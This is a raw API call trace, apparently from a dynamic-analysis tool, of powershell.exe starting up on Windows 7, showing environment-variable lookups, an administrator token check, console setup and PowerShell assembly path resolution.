	[0370.173] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0370.173] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0370.173] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0370.176] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0370.176] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0370.176] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0370.182] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0370.183] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x14d950 | out: lpConsoleScreenBufferInfo=0x14d950) returned 1
	[0370.189] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0370.190] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x14d950 | out: lpConsoleScreenBufferInfo=0x14d950) returned 1
	[0370.191] GetVersionExW (in: lpVersionInformation=0x14d8e0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14d8e0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0370.194] GetCurrentProcess () returned 0xffffffffffffffff
	[0370.195] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14d978 | out: TokenHandle=0x14d978*=0x31c) returned 1
	[0370.199] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14d898 | out: TokenInformation=0x0, ReturnLength=0x14d898) returned 0
	[0370.200] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x387250
	[0370.200] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x387250, TokenInformationLength=0x4, ReturnLength=0x14d898 | out: TokenInformation=0x387250, ReturnLength=0x14d898) returned 1
	[0370.201] DuplicateTokenEx (in: hExistingToken=0x31c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x14d9f8 | out: phNewToken=0x14d9f8*=0x318) returned 1
	[0370.201] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14d898 | out: TokenInformation=0x0, ReturnLength=0x14d898) returned 0
	[0370.201] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x387280
	[0370.201] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x387280, TokenInformationLength=0x4, ReturnLength=0x14d898 | out: TokenInformation=0x387280, ReturnLength=0x14d898) returned 1
	[0370.202] CheckTokenMembership (in: TokenHandle=0x318, SidToCheck=0x2bbc1c8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x14da08 | out: IsMember=0x14da08) returned 1
	[0370.203] CloseHandle (hObject=0x318) returned 1
	[0370.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0370.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0370.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0370.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0370.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0370.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0370.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0370.496] CoTaskMemAlloc (cb=0x804) returned 0x1b701c80
	[0370.496] GetConsoleTitleW (in: lpConsoleTitle=0x1b701c80, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0370.496] CoTaskMemFree (pv=0x1b701c80) 
	[0370.795] CoTaskMemAlloc (cb=0x804) returned 0x1b702530
	[0370.795] GetConsoleTitleW (in: lpConsoleTitle=0x1b702530, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0370.796] CoTaskMemFree (pv=0x1b702530) 
	[0370.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0370.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0370.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0370.799] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0370.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0370.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0370.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0370.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0371.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0371.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0371.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0371.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0371.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0371.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0371.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0371.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0371.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0371.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0371.613] SetConsoleCtrlHandler (HandlerRoutine=0x22268dc, Add=1) returned 1
	[0371.650] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320
	[0371.651] CoCreateGuid (in: pguid=0x14daf0 | out: pguid=0x14daf0*(Data1=0x45b33650, Data2=0xec0a, Data3=0x423b, Data4=([0]=0xb6, [1]=0x53, [2]=0xc7, [3]=0xf2, [4]=0xbd, [5]=0x79, [6]=0xc3, [7]=0x2d))) returned 0x0
	[0371.653] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0371.653] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0371.653] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0371.659] WinSqmIsOptedIn () returned 0x0
	[0371.659] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0371.659] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0371.659] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0371.660] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0371.660] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0371.660] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0371.661] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0371.661] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0371.661] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0371.661] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0371.661] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0371.661] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0371.662] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0371.662] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0371.662] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0371.663] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0371.663] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0371.663] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0371.663] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0371.664] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0371.664] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0371.664] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0371.664] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0371.664] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0371.666] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0371.666] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0371.666] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0371.671] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0371.671] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0371.671] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0371.671] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0371.671] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0371.671] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0371.672] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0371.672] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0371.672] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0372.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0372.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0372.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0372.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0372.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0372.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0372.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0372.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0372.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0372.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0372.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0372.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0372.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0372.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0372.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0372.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0372.719] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0372.719] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0372.719] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0372.976] CoTaskMemAlloc (cb=0xcc) returned 0x424c00
	[0372.976] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x424c00, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0372.976] CoTaskMemFree (pv=0x424c00) 
